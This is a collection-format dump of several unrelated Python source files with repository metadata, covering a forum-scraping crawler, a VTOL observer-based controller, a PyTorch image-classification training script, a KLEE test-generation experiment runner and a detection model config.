i = i.next
while j:
if j in hash_set:
return j
hash_set.add(j)
j = j.next
return None
| UTF-8 | Python | false | false | 1,064 | py | 138 | 160-intersection-of-two-linked-lists.py | 137 | 0.496241 | 0.496241 | 0 | 42 | 24.333333 | 90 |
specialkgb/StudyCrawl | 14,242,111,602,883 | 33da6bd239094245c160d5dca801e3f4008d257d | 0cb2a54f19435afb72181500979f53c6edc15ca2 | /apart/boardpage.py | 7aa35503b71e18f812ce494f0cc2dd45d6a3ce41 | []
| no_license | https://github.com/specialkgb/StudyCrawl | 3c1ba953fdc234a7bbf1a5de6c1bef34c270d410 | 8385cafde8883d9e49eef162a39fb31e1e75f88c | refs/heads/master | 2022-11-10T15:30:49.187134 | 2020-06-18T07:29:39 | 2020-06-18T07:29:39 | 273,171,856 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import requests
from bs4 import BeautifulSoup
cnt = 0
for page in range(1, 6):
list_url = 'http://news.sarangbang.com/bbs.html?tab=free&p={}'.format(page)
resp = requests.get(list_url)
if resp.status_code != 200:
print('WARNING: 잘못된 URL 접근')
soup = BeautifulSoup(resp.text, 'html.parser')
board_list = soup.select('tbody#bbsResult a#gLsbj_578015')
for i in range(0, 20):
# print(i, href)
# 1건의 게시글의 제목, 내용, 작성자, 작성일자 수집하는 코드
url = 'http://news.sarangbang.com{}'.format(board_list[i]['href'])
print('>>>>>>>>>>', url)
resp = requests.get(url)
# if resp.status_code != 200:
# print('WARNING: 잘못된 URL 접근')
soup = BeautifulSoup(resp.text, 'html.parser')
title = soup.select('h3.tit_view')[0].text.strip()
cnt += 1
print('TITLE ▶▶', title)
writer = soup.select('a.name_more')[0].text.strip()
print('WRITER ▶▶', writer)
date = soup.select('span.tit_cat')[1].text.strip()[:10]
print('DATE ▶▶', date)
contents = soup.select('div.bbs_view p') + soup.select('div.bbs_view div') #태그명 p의 데이터가 없을 경우 div 태그의 내용을 붙여넣기
content = ''
for i in contents:
content += i.text.strip()
print(content)
print('사랑방 부동산에서 {}건의 게시글을 수집하였습니다.'.format(cnt)) | UTF-8 | Python | false | false | 1,501 | py | 5 | boardpage.py | 5 | 0.570681 | 0.550486 | 0 | 43 | 30.116279 | 118 |
pratik-ingle/Planar-VTOL | 14,259,291,427,562 | d986ed67dd4ba10df9921c088f86c0fa2e1cb724 | e18409e0455d020e536d87e68fd8e115aedb7a8f | /Observers:Disturbance/hw13/vtolController.py | 586314cef67f8f96822bbe69b495b5a0c82a3b4b | []
| no_license | https://github.com/pratik-ingle/Planar-VTOL | 28c8d8ca13200c37cc5880b81a4acc0435afd55f | 82a8c8a608d4a438fd847d7c42d11fcf81319475 | refs/heads/main | 2023-04-25T00:27:13.900226 | 2021-05-19T17:35:47 | 2021-05-19T17:35:47 | 321,948,258 | 2 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null |
import numpy as np
import vtolParamhw13 as P
import vtolParam as P1
class PDController:
def __init__(self):
self.x1_hat = np.array([
[0.0], # initial estimate for z_hat
[0.0], # initial estimate for theta_hat
[0.0], # initial estimate for z_hat_dot
[0.0]]) # initial estimate for theta_hat_dot
self.x2_hat =np.array([
[0.0], # initial estimate for h_hat
[0.0]]) # initial estimate for h_hat_dot
self.F_lat = 0.0 # Computed latral Force, delayed by one sample
self.F_lon = 0.0 # Computed longitudinal Force, delayed by one sample
self.integrator = 0.0 # integrator
self.error_d1 = 0.0 # error signal delayed by 1 sample
self.K_z = P.K_z # state feedback gain
self.K_h = P.K_h # state feedback gain
self.ki_z = P.ki_z # integrator gain
self.ki_h = P.ki_h # integrator gain
self.L_z = P.L_z # observer gain
self.L_h = P.L_h # observer gain
self.A_z = P.A_z # system model lat
self.B_z = P.B_z
self.C_z = P.C_z
self.A_h = P.A_h # system model long
self.B_h = P.B_h
self.C_h = P.C_h
self.limit = P.F_max # Maximum force
self.Ts = P.Ts # sample rate of controller
#------------------------------------------------------------------------------
# def update_lat(self, zref,state):
# # Compute the state feedback controller
# z = state
# error = zref - z
# self.integrateError(error)
# F_unsat = self.K_z @ z + self.ki_z *self.integrator
#
# tau = self.saturate(F_unsat[0])
# return tau.item(0)
def update_lat(self, z_r, y):
# update the observer and extract z_hat
x1_hat = self.update_observer_z(y)
z_hat = x1_hat.item(0)
# integrate error
error = z_r - z_hat
self.integrate_error(error)
# Compute the state feedback controller
F_unsat = -self.K_z*x1_hat - self.ki_z*self.integrator
F_sat = self.saturate(F_unsat.item(0))
self.F_lat= F_sat
return F_sat, x1_hat
def update_observer_z(self, y_m):
# update the observer using RK4 integration
F1 = self.observer_f_lat(self.x1_hat, y_m)
F2 = self.observer_f_lat(self.x1_hat + self.Ts / 2 * F1, y_m)
F3 = self.observer_f_lat(self.x1_hat + self.Ts / 2 * F2, y_m)
F4 = self.observer_f_lat(self.x1_hat + self.Ts * F3, y_m)
self.x1_hat += self.Ts / 6 * (F1 + 2 * F2 + 2 * F3 + F4)
return self.x1_hat
def observer_f_lat(self, x1_hat, y_m):
# xhatdot = A*xhat + B*u + L(y-C*xhat)
x1hat_dot = self.A_z @ x1_hat \
+ self.B_z * self.F_lat \
+ self.L_z @ (y_m-self.C_z @ x1_hat)
return x1hat_dot
#------------------------------------------------------------------------------
# def update_lon(self,ref,state):
# x = state
#
# #F = (P.mc+P.ml+P.mr)*P.g + self.kp * (ref - x) - self.kd * xdot
#
# x = state
# # integrate error
# error = ref - x
# self.integrateError(error)
# # Compute the state feedback controller
# F_unsat = (P1.mc+P1.ml+P1.mr)*P1.g -self.K_h @ x + self.ki_h*self.integrator
# F = self.saturate(F_unsat[0])
# return F.item(0)
def update_lon(self, h_r, y):
# update the observer and extract z_hat
x2_hat = self.update_observer_h(y)
h_hat = x2_hat.item(0)
# integrate error
error = h_r - h_hat
self.integrate_error(error)
# Compute the state feedback controller
F_unsat = (P1.mc+P1.ml+P1.mr)*P1.g -self.K_h*x2_hat - self.ki_h*self.integrator
F_sat = self.saturate(F_unsat.item(0))
self.F_lon= F_sat
return F_sat, x2_hat
def update_observer_h(self, y_m):
# update the observer using RK4 integration
F1 = self.observer_f_lon(self.x2_hat, y_m)
F2 = self.observer_f_lon(self.x2_hat + self.Ts / 2 * F1, y_m)
F3 = self.observer_f_lon(self.x2_hat + self.Ts / 2 * F2, y_m)
F4 = self.observer_f_lon(self.x2_hat + self.Ts * F3, y_m)
self.x2_hat += self.Ts / 6 * (F1 + 2 * F2 + 2 * F3 + F4)
return self.x2_hat
def observer_f_lon(self, x2_hat, y_m):
# xhatdot = A*xhat + B*u + L(y-C*xhat)
print(self.x2_hat,y_m)
x2hat_dot = self.A_h @ x2_hat \
+ self.B_h * self.F_lon \
+ self.L_h @ (y_m-self.C_h @ x2_hat)
return x2hat_dot
#------------------------------------------------------------------------------
def saturate(self,u):
if abs(u) > self.limit:
u = self.limit*np.sign(u)
return u
def integrateError(self, error):
self.integrator = self.integrator \
+ (self.Ts/2.0)*(error + self.error_d1)
self.error_d1 = error
#-------------------------------------------------------------------------------------
'''
import numpy as np
import pendulumParamHW13 as P
class pendulumController:
def __init__(self):
self.x_hat = np.array([
[0.0], # initial estimate for z_hat
[0.0], # initial estimate for theta_hat
[0.0], # initial estimate for z_hat_dot
[0.0]]) # initial estimate for theta_hat_dot
self.F_d1 = 0.0 # Computed Force, delayed by one sample
self.integrator = 0.0 # integrator
self.error_d1 = 0.0 # error signal delayed by 1 sample
self.K = P.K # state feedback gain
self.ki = P.ki # integrator gain
self.L = P.L # observer gain
self.A = P.A # system model
self.B = P.B
self.C = P.C
self.limit = P.F_max # Maximum force
self.Ts = P.Ts # sample rate of controller
def update(self, z_r, y):
# update the observer and extract z_hat
x_hat = self.update_observer(y)
z_hat = x_hat.item(0)
# integrate error
error = z_r - z_hat
self.integrate_error(error)
# Compute the state feedback controller
F_unsat = -self.K*x_hat - self.ki*self.integrator
F_sat = self.saturate(F_unsat.item(0))
self.F_d1 = F_sat
return F_sat, x_hat
def update_observer(self, y_m):
# update the observer using RK4 integration
F1 = self.observer_f(self.x_hat, y_m)
F2 = self.observer_f(self.x_hat + self.Ts / 2 * F1, y_m)
F3 = self.observer_f(self.x_hat + self.Ts / 2 * F2, y_m)
F4 = self.observer_f(self.x_hat + self.Ts * F3, y_m)
self.x_hat += self.Ts / 6 * (F1 + 2 * F2 + 2 * F3 + F4)
return self.x_hat
def observer_f(self, x_hat, y_m):
# xhatdot = A*xhat + B*u + L(y-C*xhat)
xhat_dot = self.A @ x_hat \
+ self.B * self.F_d1 \
+ self.L @ (y_m-self.C @ x_hat)
return xhat_dot
def integrate_error(self, error):
self.integrator = self.integrator \
+ (self.Ts/2.0)*(error + self.error_d1)
self.error_d1 = error
def saturate(self,u):
if abs(u) > self.limit:
u = self.limit*np.sign(u)
return u
'''
| UTF-8 | Python | false | false | 7,378 | py | 22 | vtolController.py | 21 | 0.504608 | 0.483464 | 0 | 213 | 33.633803 | 87 |
OpenHack-Eyes/Eyes_WebServer | 17,480,516,921,188 | af5ec875f82ee7f58f9908259a0fa76cfeb33b73 | 363811bab819cde2d1ea0e6793db48a46b69032d | /app/ObjectMapper.py | e363a393d347403b6776e2c28487d945e3ef4bf3 | []
| no_license | https://github.com/OpenHack-Eyes/Eyes_WebServer | 6342166887fa168976fd138a07165a20afb6a1dc | 8a7ecbfadd094762b116ca73e6760c680a6019bb | refs/heads/master | 2020-03-21T20:45:27.571508 | 2018-06-30T02:55:39 | 2018-06-30T02:55:39 | 139,026,174 | 0 | 1 | null | null | null | null | null | null | null | null | null | null | null | null | null | from app.Model import HistoryVO, PatientVO
def get_histories(histories):
history_list = []
    for history in histories: # take each inner list (row) out of the query result
history = HistoryVO.HistoryVO(history[0], history[1], history[2], history[3], history[4], history[5], history[6])
history_list.append(history.serialize())
return history_list
def get_patient(patient_info):
return PatientVO.PatientVO(patient_info) | UTF-8 | Python | false | false | 437 | py | 11 | ObjectMapper.py | 7 | 0.702638 | 0.685851 | 0 | 13 | 31.153846 | 121 |
gavin0430/Visual-Recognition-using-Deep-Learning | 5,677,946,791,583 | 6cd84677367ecde58444705dfa7c4fd0aa940d06 | 0b9f931ad846b7d75aba1895251223ef5874cbd9 | /lab1/HW1.py | c271a6915fc8b47b014ac3454e7c4f5192b78b0f | []
| no_license | https://github.com/gavin0430/Visual-Recognition-using-Deep-Learning | 89486064fb1a3b0b47f87ceb933f42b879bfccc1 | 1a96329e65a9850adf797ef6922417266b018fe8 | refs/heads/master | 2020-08-07T22:03:46.756427 | 2019-12-25T15:47:31 | 2019-12-25T15:47:31 | 213,599,424 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #!/usr/bin/env python
# coding: utf-8
# In[1]:
import os
import time
import numpy as np
import pandas as pd
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.utils.data import DataLoader
from torchvision import datasets
from torchvision import transforms
import torchvision.models as models
import matplotlib.pyplot as plt
from PIL import Image
#os.environ['CUDA_LAUNCH_BLOCKING'] = "1"
# In[2]:
NUM_CLASSES = 13
BATCH_SIZE = 20
LEARNING_RATE = 0.001
NUM_EPOCHS = 300
DEVICE = 'cuda:1'  # note: only passed to compute_accuracy(); tensors are actually moved with .cuda()
device = torch.device('cuda')
# In[3]:
#####Load Data###########
data_transform = transforms.Compose([
transforms.RandomResizedCrop(224),
transforms.RandomHorizontalFlip(),
transforms.Grayscale(num_output_channels=3),
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406],std=[0.229, 0.224, 0.225])
])
training_data = datasets.ImageFolder(root='./train',transform=data_transform)
train_loader = torch.utils.data.DataLoader(training_data, batch_size=BATCH_SIZE, shuffle=True, num_workers=4)
for images, labels in train_loader:
print('Image batch dimensions:', images.shape)
print('Image label dimensions:', labels.shape)
#print(images)
#images = images.cuda()
break
# In[ ]:
###Using different model
model = models.resnet50(pretrained=True, progress=True)
model.fc = nn.Linear(2048, NUM_CLASSES)
#print(torch.device('cuda'))
#model.to(device)
model = model.cuda()
print(model)
optimizer = torch.optim.Adam(model.parameters(), lr=LEARNING_RATE)
# In[4]:
model = models.resnext101_32x8d(pretrained=True, progress=True)
model.fc = nn.Linear(2048, NUM_CLASSES)
print(model)
model = model.cuda()
optimizer = torch.optim.Adam(model.parameters(), lr=LEARNING_RATE)
# In[ ]:
model = models.wide_resnet101_2(pretrained=True, progress=False)
model.fc = nn.Linear(2048, NUM_CLASSES)
print(model)
model = model.cuda()
optimizer = torch.optim.Adam(model.parameters(), lr=LEARNING_RATE)
# In[5]:
#model = torch.load('./resnext101_32x8d')
def compute_accuracy(model, data_loader, device):
correct_pred, num_examples = 0, 0
for i, (features, targets) in enumerate(data_loader):
#features = features.to(device)
#targets = targets.to(device)
features = features.cuda()
targets = targets.cuda()
#logits, probas = model(features)
logits = model(features)
probas = F.softmax(logits, dim=1)
_, predicted_labels = torch.max(probas, 1)
num_examples += targets.size(0)
correct_pred += (predicted_labels == targets).sum()
return correct_pred.float()/num_examples * 100
def adjust_learning_rate(optimizer, epoch):
"""Sets the learning rate to the initial LR decayed by 10 every 20 epochs"""
lr = LEARNING_RATE * (0.1 ** (epoch // 20))
for param_group in optimizer.param_groups:
param_group['lr'] = lr
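# Worked example of the step decay above with LEARNING_RATE = 0.001:
#   epochs 0-19 -> lr = 0.001, epochs 20-39 -> lr = 0.0001, epochs 40-59 -> lr = 0.00001, ...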
best_acc = 0.93
start_time = time.time()
for epoch in range(NUM_EPOCHS):
model.train()
for batch_idx, (features, targets) in enumerate(train_loader):
#features = features.to(DEVICE)
#targets = targets.to(DEVICE)
features = features.cuda()
targets = targets.cuda()
### FORWARD AND BACK PROP
#logits, probas = model(features)
logits = model(features)
probas = F.softmax(logits, dim=1)
#print(logits)
cost = F.cross_entropy(logits, targets)
optimizer.zero_grad()
cost.backward()
### UPDATE MODEL PARAMETERS
optimizer.step()
adjust_learning_rate(optimizer, epoch)
### LOGGING
if not batch_idx % 30:
print ('Epoch: %03d/%03d | Batch %04d/%04d | Cost: %.4f'
%(epoch+1, NUM_EPOCHS, batch_idx,
len(train_loader), cost))
model.eval()
with torch.set_grad_enabled(False): # save memory during inference
acc = compute_accuracy(model, train_loader, device=DEVICE)
print('Epoch: %03d/%03d | Train: %.3f%%' % (
epoch+1, NUM_EPOCHS, acc))
if acc > best_acc:
torch.save(model, './resnext101_32x8d_300')
best_acc = acc
print("model save at acc = ",acc)
print('Time elapsed: %.2f min' % ((time.time() - start_time)/60))
print('Total Training Time: %.2f min' % ((time.time() - start_time)/60))
# In[8]:
###Testing##############
import csv
model = torch.load('./resnext101_32x8d_300')
testing_data = datasets.ImageFolder(root='./test1',transform=data_transform)
test_loader = torch.utils.data.DataLoader(testing_data, batch_size=1, shuffle=False, num_workers=4)
label = ['bedroom','coast','forest','highway','insidecity','kitchen','livingroom','mountain','office','opencountry','street','suburb','tallbuilding']
#print(testing_data[1039])
k = 0
with open('output5.csv', 'w', newline='') as csvfile:
writer = csv.writer(csvfile)
writer.writerow(['id','label'])
for i, (images, labels) in enumerate(test_loader):
images = images.cuda()
model.eval()
logits = model(images)
probas = F.softmax(logits, dim=1)
_, predicted_labels = torch.max(probas, 1)
#print(predicted_labels)
image_id = 'image_' + "%04d" % k
#print(image_id)
print(image_id,label[predicted_labels[0].item()])
writer.writerow([image_id,label[predicted_labels[0].item()]])
#break
k+=1
'''
with open('output.csv', 'w', newline='') as csvfile:
writer = csv.writer(csvfile)
writer.writerow(['id','label'])
for i, (images, labels) in enumerate(test_loader):
images = images.cuda()
model.eval()
logits = model(images)
probas = F.softmax(logits, dim=1)
_, predicted_labels = torch.max(probas, 1)
#print(predicted_labels[0].item())
image_id = 'image_' + "%04d" % i
print()
for j in range(10):
writer.writerow([image_id,label[]])
break
'''
# In[7]:
torch.save(model, './resnext101_32x8d_300_last')
#rr = torch.load('./resnet50_first_try')
#rr.eval()
#print(rr)
| UTF-8 | Python | false | false | 6,221 | py | 5 | HW1.py | 2 | 0.621926 | 0.593634 | 0 | 222 | 27.018018 | 149 |
MinseokJGit/dd-klee | 2,370,821,967,776 | cc849ea8f4fbeb04f69171d84ac1889c7b913a13 | 880451e55a554b4e730fb838faedbec4f6be8037 | /paradyse/subscripts/check_w.py | 038572f150e07051d08450c547463c68e55a0de4 | []
| no_license | https://github.com/MinseokJGit/dd-klee | a61c09bbd3fb3cedda651fa65a96f4b62c9417b0 | eb23ae83b5f8432ee693e43ab98d22311d359d4a | refs/heads/master | 2023-09-01T15:31:12.648356 | 2021-01-14T11:41:14 | 2021-01-14T11:41:14 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from multiprocessing import Process, Value, Queue
import signal
import subprocess
import os
import sys
import random
import json
import argparse
import datetime
import shutil
import re
import glob
from subprocess import Popen, PIPE
import time
from threading import Timer
import math
start_time = datetime.datetime.now()
date = start_time.strftime('%m')
__run_count = Value('i', 0)
configs = {
'script_path': os.path.abspath(os.getcwd()),
'date': date,
'b_dir': os.path.abspath('../build/'),
'top_dir': os.path.abspath('../experiments/')
}
def Timeout_Checker(total_time, init_time):
init_time=datetime.datetime.strptime(init_time,'%Y-%m-%d %H:%M:%S.%f')
current_time = datetime.datetime.now()
elapsed_time = (current_time-init_time).total_seconds()
if total_time < elapsed_time:
os.chdir(configs['script_path'])
print ("#############################################")
print ("################Time Out!!!!!################")
print ("#############################################")
return 100
else:
return 0
def load_pgm_config(config_file):
with open(config_file, 'r') as f:
parsed = json.load(f)
return parsed
def gen_run_cmd(pgm, weight_idx, trial, a_budget, idx):
argv = "--sym-args 0 1 10 --sym-args 0 2 2 --sym-files 1 8 --sym-stdin 8 --sym-stdout"
log = "logs/" + "__".join([pgm+"check"+trial, str(weight_idx), "ours", str(idx)]) + ".log"
weight = configs['script_path'] +"/"+trial+ "_weights/" + str(weight_idx) + ".weight"
run_cmd = " ".join([configs['b_dir']+"/bin/klee",
"-only-output-states-covering-new", "--simplify-sym-indices", "--output-module=false",
"--output-source=false", "--output-stats=false", "--disable-inlining",
"--optimize", "--use-forked-solver", "--use-cex-cache", "--libc=uclibc",
"--posix-runtime", "-env-file="+configs['b_dir']+"/../test.env",
"--max-sym-array-size=4096", "--max-memory-inhibit=false",
"--switch-type=internal", "--use-batching-search", "--batch-instructions=10000",
"--watchdog -max-time="+a_budget, "-search=param",
"-weight="+weight, pgm+".bc", argv])
return (run_cmd, log)
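# The command assembled above has roughly this shape (paths shortened, values illustrative):
#   <b_dir>/bin/klee -only-output-states-covering-new ... -search=param \
#       -weight=<script_path>/<trial>_weights/<weight_idx>.weight <pgm>.bc \
#       --sym-args 0 1 10 --sym-args 0 2 2 --sym-files 1 8 --sym-stdin 8 --sym-stdout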
def Cal_Coverage(cov_file):
coverage=0
with open(cov_file, 'r') as f:
lines= f.readlines()
for line in lines:
if "Taken at least" in line:
data=line.split(':')[1]
percent=float(data.split('% of ')[0])
total=int((data.split('% of ')[1]).strip())
cov=int(percent*total/100)
coverage=coverage+cov
return coverage
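# Illustrative gcov -b summary line consumed above (numbers are made up):
#   "Taken at least once:62.50% of 80" -> cov = int(62.50 * 80 / 100) = 50
# The absolute counts of all matching lines in cov_result are summed into `coverage`.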
def Kill_Process(process, testcase):
with open(configs['script_path']+"/killed_history", 'a') as f:
f.write(testcase+"\n")
os.killpg(os.getpgid(process.pid), signal.SIGTERM)
print("timeover!")
def run_all(pconfig, n_parallel, pgm, n_iter, weights, trial, total_time, init_time, a_budget, ith_trial):
top_dir = "/".join([configs['top_dir'], ith_trial+"__check"+trial, pgm])
log_dir = top_dir + "/" + "__".join([pgm,"check"+trial, "logs"])
if not os.path.exists(log_dir):
os.makedirs(log_dir)
Tasks=[]
for w_idx in weights:
for i in range(1,n_iter+1):
Tasks.append((w_idx,i))
A_core_task = int(math.floor(len(Tasks)/n_parallel))
remain_tasks= len(Tasks)%n_parallel
idx_list=[0]
acc_idx=0
for i in range(0,n_parallel):
if i < remain_tasks:
acc_idx=acc_idx+A_core_task+1
else:
acc_idx=acc_idx+A_core_task
idx_list.append(acc_idx)
procs = []
rets = []
q = Queue()
for group_id in range(0,n_parallel):
subTask=Tasks[idx_list[group_id]:idx_list[group_id+1]]
procs.append(Process(target=running_function, args=(pconfig, pgm, top_dir, log_dir, subTask, group_id+1, trial, total_time, a_budget, init_time, q)))
for p in procs:
p.start()
for p in procs:
ret = q.get()
rets.append(ret)
if 100 in rets:
sys.exit(100)
def running_function(pconfig, pgm, top_dir, log_dir, subTask, group_id, trial, total_time, a_budget, init_time, queue):
instance_dir = top_dir + "/" + str(group_id)
dir_cp_cmd = " ".join(["cp -r", pconfig['pgm_dir'], instance_dir])
os.system(dir_cp_cmd)
tc_location=instance_dir+"/"+pconfig['exec_dir']
os.chdir(tc_location)
if not os.path.exists("logs"):
os.mkdir("logs")
cnt=0
rc=0
for task in subTask:
weight_idx=task[0]
idx=task[1]
os.chdir(tc_location)
(run_cmd, log) = gen_run_cmd(pgm, weight_idx, trial, a_budget, idx)
rc=Timeout_Checker(total_time, init_time)
if rc==100:
break
os.system(run_cmd)
klee_dir ="klee-out-"+str(cnt)
os.chdir(klee_dir)
testcases= glob.glob("*.ktest")
testcases.sort(key=lambda x:float((x.split('.ktest')[0]).split('test')[1]))
gcov_location="/".join([configs['script_path'], pconfig['gcov_path']+str(group_id), pconfig['exec_dir']])
os.chdir(gcov_location)
rm_cmd = " ".join(["rm", pconfig['gcov_file'], pconfig['gcda_file'], "cov_result"])
os.system(rm_cmd)
log_name = pgm+trial+"__check"+str(weight_idx)+"__"+str(idx)+".log"
klee_dir_location="/".join([tc_location, klee_dir])
for tc in testcases:
run_cmd=[configs['b_dir']+"/bin/klee-replay", "./"+pgm, klee_dir_location+"/"+tc]
proc = subprocess.Popen(run_cmd, preexec_fn=os.setsid, stdout=PIPE, stderr=PIPE)
my_timer = Timer(0.1, Kill_Process, [proc, tc_location+"/"+tc])
try:
my_timer.start()
stdout, stderr = proc.communicate()
lines = stderr.splitlines()
finally:
my_timer.cancel()
gcov_file="cov_result"
gcov_cmd=" ".join(["gcov", "-b", pconfig['gcda_file'], "> "+gcov_file])
os.system(gcov_cmd)
coverage=Cal_Coverage(gcov_file)
with open(log_name, "a") as tf:
tf.write(str(weight_idx)+": "+str(coverage)+"\n")
cnt = cnt+1
mv_cmd = " ".join(["mv", log_name, log_dir])
os.system(mv_cmd)
os.chdir(tc_location)
os.chdir(configs['script_path'])
queue.put(rc)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("pgm_config")
parser.add_argument("n_parallel")
parser.add_argument("n_iter")
parser.add_argument("trial")
parser.add_argument("-l", type=lambda s:[int(item) for item in s.split(',')])
parser.add_argument("total_time")
parser.add_argument("init_time")
parser.add_argument("a_budget")
parser.add_argument("ith_trial")
args = parser.parse_args()
pconfig = load_pgm_config(args.pgm_config)
n_parallel = int(args.n_parallel)
pgm = pconfig['pgm_name']
n_iter = int(args.n_iter)
trial = args.trial
weights = args.l
total_time = int(args.total_time)
init_time = args.init_time
a_budget = args.a_budget
ith_trial= args.ith_trial
run_all(pconfig, n_parallel, pgm, n_iter, weights, trial, total_time, init_time, a_budget, ith_trial)
| UTF-8 | Python | false | false | 7,562 | py | 39 | check_w.py | 27 | 0.554351 | 0.546681 | 0 | 217 | 33.847926 | 157 |
zzf-technion/EduParser | 3,298,534,930,244 | b0676d44d1c5d2cf44cb8da28eebca6614f64bba | 0140dbcd57d17ba82f32ead44cebe61f0e25a91a | /eduParser/out/ustc/信息科学技术学院/MyHandler.py | 2415afb07658ff4a31c2e2e7c194bf4ee7f39f8b | []
| no_license | https://github.com/zzf-technion/EduParser | 03b59d1e614c2cb21fdaf8339c6c06090545f4ae | 05f17dbc7e5eb3d063eeac01e266646b5d073556 | refs/heads/master | 2020-06-16T14:52:48.288113 | 2016-01-06T00:50:27 | 2016-01-06T00:50:27 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | # coding=utf-8
import os
from models import Employee
from bs4 import BeautifulSoup
from config import Config
from mparser import ProfileParser
from mparser import get_doc_bySelenium
import re
# @brief: converts the filtered result into Employee data
# @tag: the input is the BeautifulSoup tag object to be processed
# @output: returns an Employee
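# Expected input row layout (illustrative, inferred from the parsing below): a <tr> whose
# cells are ordered as
#   <td>department</td> <td><a href="...">name</a></td> <td>title</td>
#   [<td>research</td>] <td>email</td> <td>tel</td>
# i.e. five cells when there is no research column and six cells when there is one.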
def handler(tag):
tds = tag.find_all(name='td')
if not tds or len(tds) < 5:
return None
department = tds[0].get_text()
if not department or len(department) == 0:
return None
department = department.strip()
name = tds[1].get_text().strip()
name = ''.join(name.split())
url = ''
ass = tds[1].find_all('a')
if ass:
url = ass[0]['href']
title = tds[2].get_text() or ''
title = title.strip()
email = ''
research = ''
tel = ''
if len(tds) == 5:
email = tds[3].get_text() or ''
email = email.strip()
tel = tds[4].get_text() or ''
tel = tel.strip()
elif len(tds) == 6:
research = tds[3].get_text() or ''
research = research.strip()
email = tds[4].get_text() or ''
email = email.strip()
tel = tds[5].get_text() or ''
tel = tel.strip()
return Employee(name=name, email=email, tel=tel, research = research, departments=department)
| UTF-8 | Python | false | false | 1,338 | py | 176 | MyHandler.py | 21 | 0.584496 | 0.572093 | 0 | 54 | 22.888889 | 97 |
luqiang6q/mobile_detect | 10,402,410,814,467 | dc4468e93e8cf6581bfe4e32f8d2ba26c9b265c6 | 923a0c9396169f9c7831efe943a3637b63a4085c | /configs/mbv3_config.py | b9e3fac701f296f648f37f20bd0fcc5e020f431c | []
| no_license | https://github.com/luqiang6q/mobile_detect | 00e6bef9405a8010f6072c1a61422326d88eafaa | eceda8d262744932eac7eff1d98972c785419e3a | refs/heads/master | 2022-04-05T06:32:03.657194 | 2020-02-21T03:12:36 | 2020-02-21T03:12:36 | null | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | #-*-coding:utf-8-*-
import os
import numpy as np
from easydict import EasyDict as edict
config = edict()
os.environ["CUDA_VISIBLE_DEVICES"] = "0" ##if u use muti gpu set them visiable there and then set config.TRAIN.num_gpu
config.TRAIN = edict()
#### below are params for dataiter
config.TRAIN.process_num = 5 ### process_num for data provider
config.TRAIN.prefetch_size = 20                  ### prefetch queue size for data provider
config.TRAIN.num_gpu = 1 ##match with os.environ["CUDA_VISIBLE_DEVICES"]
config.TRAIN.batch_size = 32 ###A big batch size may achieve a better result, but the memory is a problem
config.TRAIN.log_interval = 10
config.TRAIN.epoch = 300                          ### just keep training; evaluation should be taken care of by yourself,
                                                  ### generally 100,000 iters is enough
config.TRAIN.train_set_size=13000 ###widerface train size
config.TRAIN.val_set_size=3200 ###widerface val size
config.TRAIN.iter_num_per_epoch = config.TRAIN.train_set_size // config.TRAIN.num_gpu // config.TRAIN.batch_size
config.TRAIN.val_iter=config.TRAIN.val_set_size// config.TRAIN.num_gpu // config.TRAIN.batch_size
config.TRAIN.lr_value_every_step = [0.00001,0.0001,0.001,0.0001,0.00001,0.000001] ##warm up is used
config.TRAIN.lr_decay_every_step = [500,1000,60000,80000,100000]
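# Illustrative reading of the two lists above (assuming a piecewise-constant schedule with
# the listed step boundaries): steps [0,500) -> 1e-5 (warm up), [500,1000) -> 1e-4,
# [1000,60000) -> 1e-3, [60000,80000) -> 1e-4, [80000,100000) -> 1e-5, then 1e-6 afterwards.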
config.TRAIN.opt='adam'
config.TRAIN.weight_decay_factor = 5.e-4 ##l2 regular
config.TRAIN.vis=False ##check data flag
config.TRAIN.norm='BN' ##'GN' OR 'BN'
config.TRAIN.lock_basenet_bn=False
config.TRAIN.frozen_stages=-1 ##no freeze
config.DATA = edict()
config.DATA.root_path=''
config.DATA.train_txt_path='train.txt'
config.DATA.val_txt_path='val.txt'
config.DATA.num_category=1 ###face 1 voc 20 coco 80
config.DATA.num_class = config.DATA.num_category + 1 # +1 background
config.DATA.PIXEL_MEAN = [127.] ###rgb
config.DATA.PIXEL_STD = [127.]
config.DATA.hin = 480 # input size
config.DATA.win = 480
config.DATA.channel = 3
config.DATA.max_size=[config.DATA.hin,config.DATA.win] ##h,w
config.DATA.cover_small_face=10 ###cover the small faces
config.DATA.mutiscale=False # if multi-scale is disabled (False), config.DATA.max_size is used as the fixed input size
config.DATA.scales=(320,640)
# anchors -------------------------
config.ANCHOR = edict()
config.ANCHOR.rect=True
config.ANCHOR.rect_longer=False #### make anchor h/w=1.5
config.ANCHOR.ANCHOR_STRIDE = 16
config.ANCHOR.ANCHOR_SIZES = (32,128,512) # sqrtarea of the anchor box
config.ANCHOR.ANCHOR_STRIDES = (8, 16, 32) # strides for each FPN level. Must be the same length as ANCHOR_SIZES
config.ANCHOR.ANCHOR_RATIOS = (1., 4.) ###### 1:2 in size,
config.ANCHOR.POSITIVE_ANCHOR_THRESH = 0.35
config.ANCHOR.NEGATIVE_ANCHOR_THRESH = 0.35
config.ANCHOR.AVG_MATCHES=20
config.ANCHOR.super_match=True
##mobilenetv3 as basemodel
config.MODEL = edict()
config.MODEL.continue_train=False ### revover from a trained model
config.MODEL.model_path = './model/' # save directory
config.MODEL.net_structure='MobilenetV3' ######'resnet_v1_50,resnet_v1_101,MobilenetV2
config.MODEL.pretrained_model='./v3-small-minimalistic_224_1.0_float/ema/model-498000'
config.MODEL.fpn_dims=[128,128,128]
config.MODEL.cpm_dims=[128,128,128]
config.MODEL.focal_loss=True
config.MODEL.fpn=True
config.MODEL.max_negatives_per_positive= 3.0
config.MODEL.deployee= None ### tensorflow, mnn, coreml
if config.MODEL.deployee:
config.TRAIN.batch_size = 1
config.MODEL.iou_thres= 0.5
config.MODEL.score_thres= 0.5
config.MODEL.max_box= 10 | UTF-8 | Python | false | false | 3,788 | py | 9 | mbv3_config.py | 7 | 0.667371 | 0.615892 | 0 | 93 | 39.741935 | 127 |
